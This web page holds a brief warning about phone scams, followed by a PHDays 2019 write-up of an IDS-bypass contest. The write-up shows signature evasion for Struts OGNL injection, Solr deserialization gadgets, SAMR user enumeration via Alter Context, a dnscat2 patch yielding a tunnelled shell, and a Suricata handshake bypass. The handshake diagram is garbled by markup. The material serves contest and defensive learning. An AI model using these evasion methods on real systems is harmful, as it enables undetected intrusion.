The Internet is full of stories about clients who were called by someone supposedly from their bank, who tricked them into revealing their account credentials or a one-time code from an SMS message.

On occasion, office employees receive calls from "technical support staff" who request credentials used to access various programs or persuade the employees to open malicious links. A classic example: an attacker calls early Sunday morning and offers the employee a choice. Something has gone wrong, so the employee must either come to the office ASAP or simply give the username and password to the caller so the "support staff" can deal with the issue on their own.

By catching victims unaware and taking advantage of their momentary confusion, an attacker can obtain information of interest or trick users into performing certain actions.  It is vital to remember that such attacks can and do happen. Do not rush to follow instructions just because someone claims to be from the bank or technical support. Real bank employees will never ask for your usernames or passwords. They do not ask for one-time codes from SMS messages.

IDS Bypass contest at PHDays: writeup and solutions

$
0
0
Positive Hack Days 2019 included our first-ever IDS Bypass competition. Participants had to study a network segment of five hosts, and then either exploit a service vulnerability or meet a particular criterion (for example, send a certain HTTP response) in order to get a flag. Finding an exploit was easy, but the IDS complicated things as it stood between the participants and the hosts, checking every network packet. When a signature blocked the connection, participants were informed via the dashboard. Here are details on the tasks and the ways to solve them.



100.64.0.11 – Struts

More participants solved the Struts task than any of the others. After a port scan with Nmap, you find Apache Struts on port 8080.

# nmap -Pn -sV -p1-10000 100.64.0.11
631/tcp  open  ipp     CUPS 2.1
8005/tcp open  mxi?
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1


Using an Apache Struts vulnerability from 2017, an attacker could perform OGNL injection to obtain remote code execution (RCE). An exploit is available (such as on GitHub) but the IDS easily detects it:

[Drop] [**] [1:1001:1] Apache Struts2 OGNL inj in header (CVE-2017-5638) [**] 

The code of the signature is not available to participants. But the log messages make clear how it works. In this case, the signature detected OGNL injection into HTTP:

GET /showcase.action HTTP/1.1
Accept-Encoding: identity
Host: 100.64.0.11:8080
Content-Type: %{(#_='multipart/form-data')...

Studying the behavior of the IDS, it becomes clear that the IDS is reacting to the combination %{ in the beginning of the Content-Type header. There are several ways around this:


  1. @empty_jack tried separating the %{ symbols using his own dictionary for fuzzing, arriving at a solution with the string Content-Type: %${.
  2. Fuzzing the HTTP request itself. @c00lhax0r found that a null symbol in the beginning of the header will also slip past the IDS: Content-Type: \0${.
  3. Most exploits for CVE-2017-5638 inject with a percent sign. However, some researchers studying this and previous Apache Struts vulnerabilities claim that injection can just as easily start with $. Therefore the combination ${ will bypass the IDS signature and execute code on the system. This was the solution we originally had in mind.

This task was the easiest one: eight participants found a solution.

100.64.0.10 — Solr

Port 8983 hosted an Apache Solr server (written in Java).

$ nmap -Pn -sV -p1-10000 100.64.0.10
22/tcp   open  ssh     (protocol 2.0)
8983/tcp open  http    Jetty


Finding an exploit for Apache Solr 5.3.0 is easy: CVE-2019-0192. An attacker can spoof the address of the RMI server in a collection. Exploitation requires the ysoserial framework, which generates chains of Java objects (gadgets) and delivers them in various ways. For instance, from a JRMP server.

Of course, going ahead and using the exploit without finessing it first will just trigger the IDS:

[Drop] [**] [1:10002700:3001] ATTACK [PTsecurity] Java Object Deserialization RCE POP Chain (ysoserial Jdk7u21) [**]

Jdk7u21 is just one of 30 possible payloads. The choice of payloads depends on the libraries used in the vulnerable service. The Jdk7u21 gadget chain uses only standard classes from Java Development Kit (JDK) version 7u21, while the CommonsCollections1 chain contains classes from the widely used Apache Commons Collections 3.1.

An attacker can replace the RMI server address in a Solr collection with a different one and then launch the JRMP server. Solr requests an object from the attacker-indicated address and receives a malicious Java object. After the object is deserialized, its code is executed on the server.

The signature is triggered by the sequence of classes in the serialized Java object. Sent from the attacker's computer, here is how the object starts in the traffic:


The solution to this task was simple. The signature explicitly names Jdk7u21. To bypass the signature, you had to try other gadget chains. One from CommonsCollections, say. The IDS had no signatures for other chains. The participant would then get a shell on the system and read the flag. Five participants succeeded in completing this task.

100.64.0.12 – SAMR

This was one of the trickiest and most interesting tasks. The target is a Windows computer with open port 445. The flag is split into two usernames, so completing the task required enumerating all Windows users.

Naturally, MS17-010 and other exploits did not work on this computer. The list of users could be obtained with scripts, such as those from Nmap or Impacket:

$ python samrdump.py 100.64.0.12
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Retrieving endpoint list from 100.64.0.12
[*] Trying protocol 445/SMB…
Found domain(s):
 . SAMR
 . Builtin
[*] Looking up users in domain SAMR
[-] The NETBIOS connection with the remote host timed out.
[*] No entries received.

Both scripts send DCERPC requests to the computer on port 445. But things weren't so simple. Some packets are blocked by the IDS, triggering not just one, but two signatures:

[**] [1:2001:2] SAMR DCERPC Bind [**]
[Drop] [**] [1:2002:2] SAMR EnumDomainUsers Request [**]

The first signature detects the connection to SAMR and flags the TCP connection. The second signature is triggered by the SAMR EnumDomainUsers request. SAMR provides other ways to get the list of users: QueryDisplayInfo, QueryDisplayInfo2, and QueryDisplayInfo3. All these, too, were blocked by signatures.

The DCERPC protocol and Windows services contain a large number of remote administration features. Most of the well-known tools, such as PsExec and BloodHound, use DCERPC. SAMR ("SAM Remote Protocol") allows working with accounts on a host, including enumeration of the user list.

To make an EnumDomainUsers request, here's what Impacket does:


A DCERPC connection to SAMR is established over SMB, and all subsequent requests are sent in the SAMR context. Signatures are triggered by the first and last packets in the screenshot.

In the contest, there were two clues given for this task:

  • Your attempts cause IDS generate 2 alerts. Look closely at the first.
  • Which connection commands for this protocol do you know?
The idea was to start thinking about DCERPC and different connection methods. In the list of available PDUs for connecting and changing context, we find the Bind and Alter Context commands. Alter Context allows changing the current context without interrupting the connection.

To get a solution, you needed to rework the samrdump script:

  1. Bind to a different service, such as with UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5.
  2. Use Alter Context to switch to SAMR.
  3. Make an EnumDomainUsers request.

All the changes fit in just three lines:

<         dce.bind(samr.MSRPC_UUID_SAMR)
---
>         dce.bind(uuid.uuidtup_to_bin(("3919286a-b10c-11d0-9ba8-00c04fd92ef5", "0.0")))
>         dce.alter_ctx(samr.MSRPC_UUID_SAMR)
>         dce._ctx = 1

There's also another solution proposed by contest winner @psih1337. EnumDomainUsers returned a list of users sorted by SID (Security ID) rather than by name. But the SID is not a random number. For instance, the SID of the LocalSystem account is S-1-5-18. For groups or users created manually, the SID is 1000 or greater.

So if you manually bruteforce SIDs between 1000 and 2000, you are very likely to find the accounts you're looking for. In our case, the SIDs were 1008 and 1009.

This task required an understanding of the DCERPC protocol and some experience in surveying Windows infrastructure. @psih1337 was the only person to solve this task.

100.64.0.13 – DNSCAT

Port 80 hosts a web page with a form for entering an IP address.



If you type in your own IP address, port 53 receives UDP like so:

17:40:45.501553 IP 100.64.0.13.38730 > 100.64.0.187: 61936+ CNAME? dnscat.d2bc039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173)
17:40:45.501639 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209
17:40:46.520457 IP 100.64.0.13.38730 > 100.64.0.187: 21842+ TXT? dnscat.7f4e039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173)
17:40:46.520546 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209

It's clearly DNSCAT, a tool for DNS tunneling. When you type an IP address in the form, the DNSCAT client attempts to connect to that address. If the attempt is successful, the server (in other words, the participant) gets a shell on the contest computer and collects the flag.

Naturally, if we simply try to raise the DNSCAT server and accept the connection, no such luck:

[Drop] [**] [1:4001:1] 'dnscat' string found in DNS response [**]

The IDS signature is triggered by the string "dnscat" in the traffic from our server—this much is clear from the message. Obfuscating or encrypting traffic won't work.

But looking at the client code, we see that the checks are not too strict. The response need not contain the "dnscat" string at all! We only need to remove the string from the code or else replace it on the fly with the help of NetSED. It's much easier to swap it out on the fly, but here is the patch for server code just in case:

diff -r dnscat2/server/libs/dnser.rb dnscat2_bypass/server/libs/dnser.rb
<           segments << unpack("a#{len}")
>           segments << [unpack("a#{len}")[0].upcase]

<         name.split(/\./).each do |segment|
>         name.upcase.split(/\./).each do |segment|

diff -r dnscat2/server/tunnel_drivers/driver_dns.rb dnscat2_bypass/server/tunnel_drivers/driver_dns.rb
<         response = (response == "" ? "dnscat" : ("dnscat." + response))
>         response = (response == "" ? "dnsCat" : ("dnsCat." + response))

Five participants met the challenge.

100.64.0.14 – POST

No participants collected the flag for this task.


We see the now-familiar form for entering an IP address, inviting us to participate in testing new malware. One of its new tricks is bypassing the IDS in some unknown way. To get the flag, all you need to do is send the HTTP header "Server: ng1nx" in response. And the fun begins.

As expected, we get a GET request at our IP address and send a response, which gets blocked by the IDS.

[Drop] [**] [1:5002:1] 'ng1nx' Server header found. Malware shall not pass [**]

Here's the hint given to participants:
Sometimes, tasks that look hard are the simplest. If nothing seems vulnerable, maybe you're missing something right under your nose?

That "something right under your nose" is the IDS. On the detections page, you can see that we're dealing with an unprotected Suricata IDS.


Search for "Suricata IDS Bypass" and the very first link you get points to CVE-2018-6794. This vulnerability allows you to bypass packet checks if the normal TCP handshake process is interrupted and the data is sent before the process is completed. It looks like this:

Client    ->  [SYN] [Seq=0 Ack=0]           ->  Evil Server   # 1/2
Client    <- 2="" ack="1] " eq="0" evil="" font="" nbsp="" server="">->
Client    <- ack="1] " data="" eq="1" evil="" font="" here="" nbsp="" server="">->
Client    <- ack="1] " eq="83" evil="" font="" nbsp="" server="">->
Client    ->  [ACK] [Seq=1 Ack=84]          ->  Evil Server   # 3/2
Client    ->  [PSH, ACK] [Seq=1 Ack= 4]     ->  Evil Server    

You download the exploit, change the string to "ng1nx", disable kernel reset (RST) packets, and run it.

As mentioned, nobody was able to get this flag, though a few participants were very close.

Conclusion

49 people signed up for the contest, of which 12 succeeded in collecting at least one flag. Part of the excitement comes from the fact that tasks can have multiple solutions, especially the tasks that involve SMB and DCERPC. Perhaps you have a few ideas of your own?

Winners:

  • 1st place: @psih1337
  • 2nd place: @webr0ck
  • 3rd place: @empty_jack


Signature trigger statistics:



Thank you all for participating! Next year we'll have even more tasks of all levels of difficulty.

Author: Kirill Shipulin, Positive Technologies

Viewing all 198 articles
Browse latest View live